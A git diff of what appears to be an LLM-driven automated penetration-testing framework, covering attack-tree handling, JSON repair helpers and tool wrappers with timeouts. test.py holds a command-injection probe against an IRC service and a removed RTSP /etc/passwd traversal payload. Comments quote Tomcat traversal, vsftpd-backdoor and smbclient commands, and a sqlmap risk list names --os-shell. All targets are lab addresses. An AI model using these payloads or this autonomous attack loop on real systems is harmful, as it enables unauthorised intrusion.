elif node.parent.name == parent_node_name or parent_node_name.endswith(node.parent.name): # 添加当前节点的平级节点
# 是添加当前节点的平级节点(当前节点的父节点下添加子节点) --使用2233ai-o3时遇到的情况
self.add_children_node(node.parent, add_node_names)
self.logger.debug("遇到一次添加平级节点")
else:
badd = False
for child_node in node.children: # 给子节点添加子节点
if parent_node_name == child_node.name or parent_node_name.endswith(child_node.name):
badd = True
self.add_children_node(child_node, add_node_names)
self.logger.debug("遇到一次添加子节点的子节点")
break
if not badd:
self.logger.error(f"添加子节点失败!父节点不是当前节点,不是当前节点的父节点,不是当前节点的子节点,需要介入!!{node_json}---当前节点为:{node.path}") # 丢弃该节点
else: # 未处理的节点指令添加到list
residue_cmd_no_add.append(node_json)
#处理on_instruction
residue_node_cmds = []
no_instr_nodes = []
for node_cmd in residue_cmd_no_add:
action = node_cmd["action"]
if action == "no_instruction":
node_names = node_cmd["nodes"].replace('，',',').split(',')
for node_name in node_names:
# 先判断是否在测试指令中,若在则不提交llm任务,只能接受在一次返回中同一节点有多条测试指令,不允许分次返回
bcommand = False
for com in commands:
if node_name in com:
bcommand = True
break
if bcommand: # 如果存在测试指令,则不把该节点放入补充信息llm任务---尝试不对比是否有返回指令,DS会一直返回指令,还返回on_instruction
continue
#判断是否有对应节点---原则上只允许同批次add的节点没有添加指令的情况
if node_name in add_node_names:
no_instr_nodes.append(node_name)
else:
self.logger.error("遇到一次不在add_node中,但在no_instr_nodes中的数据")
#粗暴的做法,添加在当前节点下
self.add_children_node(node, [node_name])
no_instr_nodes.append(node_name)
else:#剩余的节点指令
residue_node_cmds.append(node_cmd)
#2025-5-12 是否采用本地校验节点是否有指令,如果使用,则no_instruction就可以不用了
for add_node in all_add_node:
bcommand = False
for com in commands:
if add_node in com:
bcommand = True
break
if bcommand: # 如果存在测试指令,则不把该节点放入补充信息llm任务---尝试不对比是否有返回指令,DS会一直返回指令,还返回on_instruction
continue
#没有对应指令
no_instr_nodes.append(add_node)
if no_instr_nodes: # 阻塞式,在当前节点提交补充信息,完善节点指令 -- 优势是省token
new_commands = self.get_other_instruction(no_instr_nodes, DBM, node)
commands.extend(new_commands)
#执行剩余的节点指令--不分先后
for node_json in residue_node_cmds:#2025-4-11重新调整了节点指令格式定义
for node_json in residue_cmd_no_add:
action = node_json["action"]
if action == "find_vul":
node_name = node_json["node"]
@ -754,7 +759,7 @@ class TaskObject:
vul_node.vul_type = node_json["vulnerability"]["name"]
vul_node.vul_grade = node_json["vulnerability"]["risk"]
vul_node.vul_info = node_json["vulnerability"]["info"]
#保存到数据库
#保存到数据库 --- 数据库有记录多个,tree只保留最新一个
DBM.insert_taks_vul(self.task_id,vul_node.name,vul_node.path,vul_node.vul_type,vul_node.vul_grade,
vul_node.vul_info)
except:
@ -778,6 +783,7 @@ class TaskObject:
def get_other_instruction(self,nodes,DBM,cur_node):
res_str = ','.join(nodes)
new_commands = []
no_instr_nodes = nodes
ierror = 0
while res_str:
self.logger.debug(f"开始针对f{res_str}这些节点请求测试指令")
@ -791,15 +797,15 @@ class TaskObject:
任务
1.请生成这些子节点的测试指令,注意不要生成重复的测试指令
2.这些节点的父节点为当前节点请正确生成这些节点的节点路径
3.只有当还有节点未能生成测试指令或不完整时才返回未生成指令的节点列表
'''
fake_prompt = self.DataFilter.filter_prompt(user_Prompt)
#正常不应该会有node_cmds
bsuccess,node_cmds, commands, reasoning_content, content = self.LLM.get_llm_instruction(fake_prompt,
cur_node,self.DataFilter) # message要更新
if not bsuccess:
self.logger.error(f"模型接口调用出错:{content}")
ierror += 1
if ierror == 3: #重试3
if ierror == 3: #重试3
break
continue# res_str没有调整,重复使用
res_str = ""
@ -811,18 +817,21 @@ class TaskObject:
self.logger.error(f"{cur_node.name}-llm入库失败!")
#把返回的测试指令进行追加
new_commands.extend(commands)
#判断是否还有未添加指令的节点
for node_json in node_cmds: #正常应该只有一条no_instruction --暂时只处理
if "no_instruction" in node_json and "nodes" in node_json:
tmp_nodes = []
node_names = node_json["nodes"].replace('，',',').split(',')
for node_name in node_names:
if node_name in nodes:
tmp_nodes.append(node_name)
res_str = ','.join(tmp_nodes)
break
else:#其他节点指令不处理
self.logger.error(f"遇到一次no_instruction补充指令时返回了其他节点指令{node_cmds}")
#再验证是否还有缺少的
tmp_nodes = []
for no_instr_node in no_instr_nodes:
bcommand = False
for com in commands:
if no_instr_node in com:
bcommand = True
break
if bcommand: # 如果存在测试指令,则不把该节点放入补充信息llm任务---尝试不对比是否有返回指令,DS会一直返回指令,还返回on_instruction
continue
# 没有对应指令
tmp_nodes.append(no_instr_node)
res_str = ','.join(tmp_nodes)
no_instr_nodes = tmp_nodes
self.logger.debug("未添加指令的节点,都已完成指令的添加!")
return new_commands
@ -833,11 +842,12 @@ class TaskObject:
if attack_tree: # 有值的情况是load
self.attack_tree = attack_tree
# 加载未完成的任务
if self.work_type == 1: # 自动模式
# 提交到mq,待线程执行
self.put_work_node()
# if self.work_type == 1: # 自动模式
# # 提交到mq,待线程执行
self.put_work_node(self.work_type)
else: # 无值的情况是new_create
root_node = TreeNode(self.target, self.task_id) # 根节点
root_node = TreeNode(self.target, self.task_id,0) # 根节点
self.attack_tree = AttackTree(root_node) # 创建测试树,同时更新根节点相关内容
self.LLM.build_initial_prompt(root_node) # 对根节点初始化system-msg
# 插入一个user消息
@ -938,6 +948,15 @@ class TaskObject:
return b_over
def test(self,task_id):
root_node = TreeNode(self.target, task_id,0) # 根节点
self.attack_tree = AttackTree(root_node) # 创建测试树,同时更新根节点相关内容
self.LLM.build_initial_prompt(root_node) # 对根节点初始化system-msg
# 初始保存个attack_tree文件
g_PKM.WriteData(self.attack_tree, str(task_id))
if __name__ == "__main__":
pass

64
myutils/ContentManager.py

@ -0,0 +1,64 @@
import json
class ContentManager:
def extract_json(self,s: str):
start = s.find('{')
if start < 0:
return None
depth = 0
for i, ch in enumerate(s[start:], start):
if ch == '{':
depth += 1
elif ch == '}':
depth -= 1
if depth == 0:
return s[start:i + 1]
return None # 没有闭合
def auto_complete_json(self,s: str) -> str:
"""
在字符串 s 自动检测未匹配的 { 并在末尾补全相应数量的 }
返回补全后的新字符串
"""
depth = 0
in_string = False
escape = False
for ch in s:
if escape:
escape = False
continue
if ch == '\\':
escape = True
continue
if ch == '"' and not escape:
in_string = not in_string
continue
if not in_string:
if ch == '{':
depth += 1
elif ch == '}':
if depth > 0:
depth -= 1
# depth 此时就是多余的 “{” 数量
if depth > 0:
s = s + '}' * depth
return s
def extract_and_fix_json(self,text: str):
"""
1. 找到首个 '{'然后尝试用 extract_json 的方式截取到末尾
2. 如果 extract_json 返回 None就用 auto_complete_json 补全后再试一次 json.loads
"""
# 找到第一个 {
start = text.find('{')
if start < 0:
raise ValueError("字符串中没有发现 '{'")
fragment = text[start:]
# 先自动补全一次
fixed = self.auto_complete_json(fragment)
# 再尝试解析
try:
return json.loads(fixed)
except json.JSONDecodeError as e:
raise ValueError(f"补全后仍解析失败: {e}")
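
A short usage example of the new helpers, fed the truncated find_vul output quoted in the LLMManager test block above (import path as used in LLMManager.py; the info field is left empty here for brevity):

from myutils.ContentManager import ContentManager

cm = ContentManager()
broken = '{"action":"find_vul", "node": "8180端口-Tomcat",' \
         '"vulnerability": {"name":"Tomcat弱口令漏洞","risk":"高危","info":""}'
print(cm.extract_json(broken))          # None: no balanced top-level object
print(cm.extract_and_fix_json(broken))  # dict, with the missing '}' appended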

7
myutils/PickleManager.py

@ -23,9 +23,10 @@ class PickleManager:
def ReadData(self,filename=""):
attack_tree = None
filepath = self.getfile_path(filename)
with self.lock:
with open(filepath, "rb") as f:
attack_tree = pickle.load(f)
if os.path.exists(filepath):
with self.lock:
with open(filepath, "rb") as f:
attack_tree = pickle.load(f)
return attack_tree
def DelData(self,filename=""):

10
pipfile

@ -16,6 +16,10 @@ pip install dirsearch -i https://pypi.tuna.tsinghua.edu.cn/simple/
pip install pexpect -i https://pypi.tuna.tsinghua.edu.cn/simple/
pip install smbprotocol -i https://pypi.tuna.tsinghua.edu.cn/simple/
pip install ipwhois -i https://pypi.tuna.tsinghua.edu.cn/simple
pip install geoip2 -i https://pypi.tuna.tsinghua.edu.cn/simple
pip install python-whois -i https://pypi.tuna.tsinghua.edu.cn/simple
apt install sublist3r
apt install gobuster
@ -55,6 +59,10 @@ pip install pillow -i https://pypi.tuna.tsinghua.edu.cn/simple
#redis--session使用redis缓存--kali
pip install redis aioredis -i https://pypi.tuna.tsinghua.edu.cn/simple
pip install quart-session -i https://pypi.tuna.tsinghua.edu.cn/simple
pip install packaging -i https://pypi.tuna.tsinghua.edu.cn/simple
pip install pycryptodome -i https://pypi.tuna.tsinghua.edu.cn/simple
systemctl start redis-server
systemctl enable redis-server
@ -67,4 +75,6 @@ fc-match Arial #验证安装
----python2------
----网络配置------
nmcli connection modify "zhang_wifi" ipv4.addresses 192.168.3.151/24 ipv4.gateway 192.168.3.1 ipv4.dns "8.8.8.8 114.114.114.114" ipv4.method manual

50
test.py

@ -73,7 +73,7 @@ if __name__ == "__main__":
current_path = os.path.dirname(os.path.realpath(__file__))
print(current_path)
test_type = 1
task_id = 49
task_id = 67
task_Object = TaskObject("test_target","cookie_info",1,1,1,"local_ip","",None)
if test_type == 0:
@ -81,32 +81,32 @@ if __name__ == "__main__":
elif test_type == 1:
# # 获取所有自定义函数详情 HIGH_RISK_FUNCTIONS = ['eval', 'exec', 'os.system', 'subprocess.call', 'subprocess.Popen']
instruction = '''python-code
def dynamic_fun():
import socket
import socket
def dynamic_fun():
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(20) # 设置超时时间为20秒
s.connect(("192.168.3.105", 11200))
# 发送畸形RTSP请求探测边界条件
payload = "DESCRIBE rtsp://192.168.3.105/../../../../etc/passwd RTSP/1.0\\\\r\\\\n"
payload += "CSeq: 6\\\\r\\\\n\\\\r\\\\n"
s.settimeout(10)
s.connect(('192.168.3.108', 6667))
payload = 'AB; bash -c "echo vulnerable > /tmp/irc_test"\\r\\n'
s.send(payload.encode())
response = s.recv(4096).decode()
s.close()
if "404" in response:
return (False, "存在输入过滤机制")
elif "root:" in response:
return (True, "成功读取敏感文件")
else:
return (False, f"未知响应:{response}")
check_s = socket.socket()
check_s.settimeout(5)
check_s.connect(('192.168.3.108', 6667))
check_s.send(b'AB; ls /tmp\\r\\n')
response = check_s.recv(1024).decode()
check_s.close()
if 'irc_test' in response:
return (True, "检测到命令注入漏洞")
return (False, "未检测到有效漏洞响应")
except Exception as e:
return (False, f"连接异常:{str(e)}")
return (False, f"检测失败: {str(e)}")
finally:
s.close() if 's' in locals() else None
check_s.close() if 'check_s' in locals() else None
'''
task_Object.PythonM.start_pool() #开个子进程池就行
start_time, end_time, bsuccess, instr, reslut, source_result, ext_params = task_Object.do_instruction(instruction)
@ -115,8 +115,8 @@ def dynamic_fun():
print("----执行结果----")
print(reslut)
elif test_type == 2: #给节点添加指令
node_path = "目标系统->192.168.3.105->52989端口"
instr_id = 3233
node_path = "目标系统->192.168.3.108->80端口->PHP版本漏洞检测"
instr_id = 3478
g_TaskM.load_tasks()
task = g_TaskM.tasks[task_id]
nodes = task.attack_tree.traverse_dfs()
@ -130,7 +130,7 @@ def dynamic_fun():
if "import" in str_instr:
str_instr = "python-code " + str_instr
cur_node.test_add_instr(str_instr)
cur_node.update_work_status(1)
cur_node.update_work_status(-4)
#保存数据
g_PKM.WriteData(task.attack_tree,str(task.task_id))
else:
@ -145,10 +145,10 @@ def dynamic_fun():
for node_name in unique_names:
print(node_name)
elif test_type == 4: # 修改Messages
attact_tree = g_PKM.ReadData("27")
attact_tree = g_PKM.ReadData("60")
# 创建一个新的节点
from mycode.AttackMap import TreeNode
testnode = TreeNode("test", 0)
testnode = TreeNode("test", 0,0)
LLM.build_initial_prompt(testnode) # 新的Message
systems = testnode.parent_messages[0]["content"]
# print(systems)
@ -162,5 +162,7 @@ def dynamic_fun():
mytest.dynamic_fun()
elif test_type == 6:
mytest.tmp_test()
elif test_type == 7:
task_Object.test(50)
else:
pass

2
tools/ArpingTool.py

@ -3,7 +3,7 @@ from tools.ToolBase import ToolBase
class ArpingTool(ToolBase):
def validate_instruction(self, instruction):
#指令过滤
timeout = 0
timeout = 60*15
return instruction,timeout
def analyze_result(self, result,instruction,stderr,stdout):

27
tools/CurlTool.py

@ -13,16 +13,19 @@ class CurlTool(ToolBase):
# self.url = None
# self.verify_ssl = True
def get_time_out(self):
def get_time_out(self,instruction=""):
if "&&" in instruction or "||" in instruction:
return 60*15
return 61*2
def validate_instruction(self, instruction_old):
#instruction = instruction_old
#指令过滤
timeout = self.get_time_out() #curl指令遇到不返回的情况 curl --path-as-is -i http://192.168.204.137:8180/webapps/../conf/tomcat-users.xml
timeout = self.get_time_out(instruction_old) #curl指令遇到不返回的情况 curl --path-as-is -i http://192.168.204.137:8180/webapps/../conf/tomcat-users.xml
#添加-i 返回信息头
if 'base64 -d' in instruction_old:
return instruction_old
return instruction_old,timeout
# 分割成单词列表便于处理参数
curl_parts = instruction_old.split()
@ -38,10 +41,10 @@ class CurlTool(ToolBase):
else:
curl_parts.append('-i')
# 判断是否已经有 --max-time 参数
if not any(p.startswith("--max-time") for p in curl_parts):
curl_parts.append("--max-time")
curl_parts.append(str(self.get_time_out())) #添加超时时间
# 判断是否已经有 --max-time 参数 --curl经常组合其他指令使用,不加--max-time参数了,考usbprocess的time_out控制超时
# if not any(p.startswith("--max-time") for p in curl_parts):
# curl_parts.append("--max-time")
# curl_parts.append(str(self.get_time_out())) #添加超时时间
final_instruction = ' '.join(curl_parts)
return final_instruction, timeout
@ -76,6 +79,8 @@ class CurlTool(ToolBase):
def do_worker_subprocess(self,str_instruction,timeout,ext_params):
try:
# 执行命令,捕获输出为字节形式
if not timeout:
timeout = 60*15
if timeout:
result = subprocess.run(str_instruction, shell=True,timeout=timeout, capture_output=True)
else:
@ -298,7 +303,7 @@ class CurlTool(ToolBase):
return result
def analyze_result(self, result,instruction,stderr,stdout):
if len(result) < 2000:
if len(result) < 3000:
return result
if "curl: (28) Operation timed out after" in result or "Dload Upload Total Spent Left Speed" in result:
return "执行超时"
@ -329,12 +334,8 @@ class CurlTool(ToolBase):
result="该漏洞无法利用"
elif("-kv https://" in instruction or "-vk https://" in instruction):
result = self.get_ssl_info(stderr,stdout)
elif("grep " in instruction or " -T " in instruction or "Date:" in instruction):
elif("grep " in instruction or " -T " in instruction or "Date:" in instruction or "dirb" in instruction):
return result
# elif("-X POST " in instruction):
# result = self.get_info_curl(instruction,stdout,stderr)
# elif("-v " in instruction): #curl -v http://192.168.204.137:8180/manager/html --user admin:admin 常规解析curl返回内容
# result = self.get_info_curl(instruction,stdout,stderr)
else:
result = self.get_info_curl(instruction,stdout,stderr)
return result
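
The timeout returned by validate_instruction ends up bounding subprocess.run, as the do_worker_subprocess hunk above shows, with 60*15 now used as the fallback when no timeout is set. A minimal sketch of that pattern with illustrative names:

import subprocess

def run_with_timeout(cmd, timeout=None):
    timeout = timeout or 60 * 15   # fall back to 15 minutes, as CurlTool now does
    try:
        res = subprocess.run(cmd, shell=True, capture_output=True, timeout=timeout)
        return True, res.stdout.decode(errors="replace")
    except subprocess.TimeoutExpired:
        return False, "执行超时"

print(run_with_timeout("echo hello", 60 * 2))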

2
tools/DigTool.py

@ -3,7 +3,7 @@ from tools.ToolBase import ToolBase
class DigTool(ToolBase):
def validate_instruction(self, instruction):
#指令过滤
timeout = 0
timeout = 60*5
return instruction,timeout
def analyze_result(self, result,instruction,stderr,stdout):

2
tools/DirSearchTool.py

@ -3,7 +3,7 @@ from tools.ToolBase import ToolBase
class DirSearchTool(ToolBase):
def validate_instruction(self, instruction):
#指令过滤
timeout = 0
timeout = 60*15
if "-o " not in instruction or "--output=" not in instruction:
instruction += " -o ds_result.txt"
return instruction,timeout

2
tools/DirbTool.py

@ -6,7 +6,7 @@ from tools.ToolBase import ToolBase
class DirbTool(ToolBase):
def validate_instruction(self, instruction):
#指令过滤
timeout = 0
timeout = 60*15
instruction = instruction.strip()
if " -o" not in instruction:
instruction += " -o dirout.txt"

2
tools/Enum4linuxTool.py

@ -4,7 +4,7 @@ from mycode.Result_merge import my_merge
class Enum4linuxTool(ToolBase):
def validate_instruction(self, instruction):
#指令过滤
timeout = 0
timeout = 60*15
return instruction,timeout
def analyze_result(self, result,instruction,stderr,stdout):

2
tools/Hping3Tool.py

@ -10,7 +10,7 @@ class Hping3Tool(ToolBase):
:param instruction:
:return:
'''
timeout = 0
timeout = 60*15
# 拆分原始指令为列表
cmd_parts = instruction.split()

2
tools/HydraTool.py

@ -6,7 +6,7 @@ from tools.ToolBase import ToolBase
class HydraTool(ToolBase):
def validate_instruction(self, instruction):
timeout = 0
timeout = 60*15
current_path = os.path.dirname(os.path.realpath(__file__))
#hydra过滤 需要判断指令中添加字典文件存不存在
match_p = re.search(r'-P\s+([^\s]+)', instruction)

2
tools/KubehunterTool.py

@ -7,7 +7,7 @@ from tools.ToolBase import ToolBase
class KubehunterTool(ToolBase):
def validate_instruction(self, instruction):
#指令过滤
timeout = 0
timeout = 60*15
return instruction,timeout
def analyze_result(self, result,instruction,stderr,stdout):

2
tools/MedusaTool.py

@ -3,7 +3,7 @@ from tools.ToolBase import ToolBase
class MedusaTool(ToolBase):
def validate_instruction(self, instruction):
#指令过滤
timeout = 0
timeout = 60*15
return instruction,timeout
def analyze_result(self, result,instruction,stderr,stdout):

2
tools/MkdirTool.py

@ -3,7 +3,7 @@ from tools.ToolBase import ToolBase
class MkdirTool(ToolBase):
def validate_instruction(self, instruction):
#指令过滤
timeout = 0
timeout = 60*15
return instruction,timeout
def analyze_result(self, result,instruction,stderr,stdout):

2
tools/MsfconsoleTool.py

@ -20,7 +20,7 @@ class MsfconsoleTool(ToolBase):
print("Metasploit Exit!")
def validate_instruction(self, instruction):
timeout = 0
timeout = 60*15
modified_code = ""
#针对有分号的指令情况,一般是一行
if ";" in instruction: #举例:msfconsole -q -x "use exploit/unix/ftp/vsftpd_234_backdoor; set RHOST 192.168.204.137; exploit"

2
tools/MsfvenomTool.py

@ -7,7 +7,7 @@ import tempfile
class MsfvenomTool(ToolBase):
def validate_instruction(self, instruction):
#指令过滤
timeout = 0
timeout = 60*15
return instruction,timeout
def do_worker_script(self,str_instruction,timeout,ext_params):

2
tools/NslookupTool.py

@ -3,7 +3,7 @@ from tools.ToolBase import ToolBase
class NslookupTool(ToolBase):
def validate_instruction(self, instruction):
#指令过滤
timeout = 0
timeout = 60*15
return instruction,timeout
def analyze_result(self, result,instruction,stderr,stdout):

2
tools/PingTool.py

@ -3,7 +3,7 @@ from tools.ToolBase import ToolBase
class PingTool(ToolBase):
def validate_instruction(self, instruction):
#指令过滤
timeout = 0
timeout = 60*2
return instruction,timeout
def analyze_result(self, result,instruction,stderr,stdout):

2
tools/PrintfTool.py

@ -3,7 +3,7 @@ from tools.ToolBase import ToolBase
class PrintfTool(ToolBase):
def validate_instruction(self, instruction):
#指令过滤
timeout = 0
timeout = 60*5
return instruction,timeout
def analyze_result(self, result,instruction,stderr,stdout):

2
tools/RpcclientTool.py

@ -3,7 +3,7 @@ from tools.ToolBase import ToolBase
class RpcclientTool(ToolBase):
def validate_instruction(self, instruction):
#指令过滤
timeout = 0
timeout = 60*15
return instruction,timeout
def analyze_result(self, result,instruction,stderr,stdout):

2
tools/RpcinfoTool.py

@ -3,7 +3,7 @@ from tools.ToolBase import ToolBase
class RpcinfoTool(ToolBase):
def validate_instruction(self, instruction):
#指令过滤
timeout = 0
timeout = 60*15
return instruction,timeout
def analyze_result(self, result,instruction,stderr,stdout):

2
tools/SearchsploitTool.py

@ -11,7 +11,7 @@ class SearchsploitTool(ToolBase):
cur_path = Path(__file__).resolve().parent
payload_dir = cur_path / "../payload"
#指令过滤
timeout = 0
timeout = 60*15
parts = instruction.split("&&")
if len(parts) ==2:
searchsploit_cmd = parts[0].strip()

2
tools/ShowmountTool.py

@ -3,7 +3,7 @@ from tools.ToolBase import ToolBase
class ShowmountTool(ToolBase):
def validate_instruction(self, instruction):
#指令过滤
timeout = 0
timeout = 60*15
return instruction,timeout
def analyze_result(self, result,instruction,stderr,stdout):

2
tools/SmbclientTool.py

@ -4,7 +4,7 @@ import shlex
class SmbclientTool(ToolBase):
def validate_instruction(self, instruction):
#指令过滤
timeout = 0
timeout = 60*15
instruction = instruction.replace("\\", "\\\\")
#instruction = shlex.quote(instruction) #smbclient \\\\192.168.204.137\\tmp -N -c 'put /etc/passwd test_upload; rm test_upload' 针对这样的指令会出错
return instruction,timeout

2
tools/SmbmapTool.py

@ -3,7 +3,7 @@ from tools.ToolBase import ToolBase
class SmbmapTool(ToolBase):
def validate_instruction(self, instruction):
#指令过滤
timeout = 0
timeout = 60*15
if " grep " not in instruction:
instruction =instruction.strip() + " | grep -E 'READ|WRITE|Disk|path'"
return instruction,timeout

2
tools/SmtpuserenumTool.py

@ -5,7 +5,7 @@ from tools.ToolBase import ToolBase
class SmtpuserenumTool(ToolBase):
def validate_instruction(self, instruction):
timeout = 0
timeout = 60*15
# 获取当前程序所在目录
current_path = os.path.dirname(os.path.realpath(__file__))
new_user_path = os.path.join(current_path, "../payload", "users")

2
tools/SmugglerTool.py

@ -4,7 +4,7 @@ from tools.ToolBase import ToolBase
class SmugglerTool(ToolBase):
def validate_instruction(self, instruction_old):
timeout = 0
timeout = 60*15
#指令过滤
# 获取当前程序所在目录
current_path = os.path.dirname(os.path.realpath(__file__))

2
tools/SqlmapTool.py

@ -4,7 +4,7 @@ from tools.ToolBase import ToolBase
class SqlmapTool(ToolBase):
def validate_instruction(self, instruction):
timeout = 0
timeout = 60*15
# 检查sqlmap高风险参数
high_risk_params = [
"--os-shell",

2
tools/SshpassTool.py

@ -8,7 +8,7 @@ import tempfile
class SshpassTool(ToolBase):
def validate_instruction(self, instruction):
#指令过滤
timeout = 0
timeout = 60*15
return instruction,timeout
def do_worker_script(self,str_instruction,timeout,ext_params):

2
tools/SslscanTool.py

@ -3,7 +3,7 @@ from tools.ToolBase import ToolBase
class SslscanTool(ToolBase):
def validate_instruction(self, instruction):
#指令过滤
timeout = 0
timeout = 60*15
return instruction,timeout
def analyze_result(self, result,instruction,stderr,stdout):

2
tools/Sublist3rTool.py

@ -5,7 +5,7 @@ apt install sublist3r
'''
class Sublist3rTool(ToolBase):
def validate_instruction(self, instruction):
timeout = 0
timeout = 60*15
return instruction,timeout
def analyze_result(self, result,instruction,stderr,stdout):

2
tools/SwaksTool.py

@ -3,7 +3,7 @@ from tools.ToolBase import ToolBase
class SwaksTool(ToolBase):
def validate_instruction(self, instruction):
#指令过滤
timeout = 0
timeout = 60*15
return instruction,timeout
def analyze_result(self, result,instruction,stderr,stdout):

2
tools/TouchTool.py

@ -3,7 +3,7 @@ from tools.ToolBase import ToolBase
class TouchTool(ToolBase):
def validate_instruction(self, instruction):
#指令过滤
timeout = 0
timeout = 60*15
return instruction,timeout
def analyze_result(self, result,instruction,stderr,stdout):

2
tools/WgetTool.py

@ -3,7 +3,7 @@ from tools.ToolBase import ToolBase
class WgetTool(ToolBase):
def validate_instruction(self, instruction):
#指令过滤
timeout = 0
timeout = 60*15
return instruction,timeout
def analyze_result(self, result,instruction,stderr,stdout):

2
tools/WhatwebTool.py

@ -3,7 +3,7 @@ from tools.ToolBase import ToolBase
class WhatwebTool(ToolBase):
def validate_instruction(self, instruction):
#指令过滤
timeout = 0
timeout = 60*15
return instruction,timeout
def analyze_result(self, result,instruction,stderr,stdout):

2
tools/WhoisTool.py

@ -4,7 +4,7 @@ from tools.ToolBase import ToolBase
class WhoisTool(ToolBase):
def validate_instruction(self, instruction):
#过滤
timeout = 0
timeout = 60*15
return instruction,timeout
def analyze_result(self, result,instruction,stderr,stdout):

2
tools/XvfbrunTool.py

@ -3,7 +3,7 @@ from tools.ToolBase import ToolBase
class XvfbrunTool(ToolBase):
def validate_instruction(self, instruction):
#指令过滤
timeout = 0
timeout = 60*15
return instruction,timeout
def analyze_result(self, result,instruction,stderr,stdout):

9
web/API/task.py

@ -24,19 +24,12 @@ async def start_task(): #开始任务
work_type = 0 #data.get("workType") #0-人工,1-自动
if llm_type == 2:
return jsonify({"error": "O3余额不足,请更换模型!"}), 400
# #新增任务处理
# bok,_,_ = g_TM.validate_and_extract(test_target)
# if not bok:
# # 返回错误信息,状态码 400 表示请求错误
# return jsonify({"error": "测试目标验证失败,请检查输入内容!"}), 400
#开始任务
try:
fail_list = g_TaskM.create_task(test_target,llm_type,work_type)
return jsonify({"fail_list":fail_list})
except:
return jsonify({"error": "创建任务异常,前反馈给技术人员!"}), 400
#跳转到任务管理页面
# return redirect(url_for('main.get_html', html='task_manager.html'))
@api.route('/task/taskover',methods=['POST'])
@login_required
@ -137,7 +130,7 @@ async def task_one_step():
'''
data = await request.get_json()
task_id = data.get("cur_task_id")
step_num = data.get("step_num")
step_num = int(data.get("step_num"))
if not task_id:
return jsonify({'error': 'Missing task_id'}), 400
if not step_num:

9
web/main/static/resources/scripts/task_manager.js

@ -294,6 +294,8 @@ async function overTask(){
task_list = []
cur_task = null //当前选择的task--用于修改缓存时使用
cur_task_id = 0 //当前选择的cur_task_id
//清空节点树
taskList.innerHTML = "加载中"; // 清空“加载中”提示
//重新获取任务list
getTasklist();
}else {
@ -366,10 +368,12 @@ document.getElementById("one_step").addEventListener("click",() => {
});
async function one_step_task(){
try {
const stepSElement= document.getElementById("stepNumSelect")
const step_num = stepSElement.value;
const res = await fetch("/api/task/taskstep", {
method: "POST",
headers: { "Content-Type": "application/json" },
body: JSON.stringify({ cur_task_id }), //task_id:task_id
body: JSON.stringify({ cur_task_id,step_num }), //task_id:task_id
});
if (!res.ok) {
const errorData = await res.json();
@ -437,7 +441,7 @@ function renderInstrPage(page) {
const tbody = document.querySelector("#instrTable tbody");
renderTableRows(tbody, pageData);
document.getElementById("instrTable").scrollIntoView({ behavior: "smooth" });
// 更新分页按钮
document.getElementById("instrPrev").dataset.page = page > 1 ? page - 1 : 1;
document.getElementById("instrNext").dataset.page = (end < allInstrs.length) ? page + 1 : page;
@ -532,6 +536,7 @@ function renderVulPage(page) {
const tbody = document.querySelector("#vulTable tbody");
renderTableRows(tbody, pageData);
document.getElementById("vulTable").scrollIntoView({ behavior: "smooth" });
// 更新分页按钮
document.getElementById("vulPrev").dataset.page = page > 1 ? page - 1 : 1;

2
web/main/templates/task_manager.html

@ -214,7 +214,7 @@
<button class="btn btn-primary btn-block m-2" id="actionButton">启动</button>
<div class="m-2" style="margin-bottom: 5px">
<label class="fw-bold" style="font-size:0.9rem">单步步次:</label>
<select class="form-select" id="modelSelect" style="font-size:0.9rem">
<select class="form-select" id="stepNumSelect" style="font-size:0.9rem">
<option value="1">1</option>
<option value="2">2</option>
<option value="3">3</option>
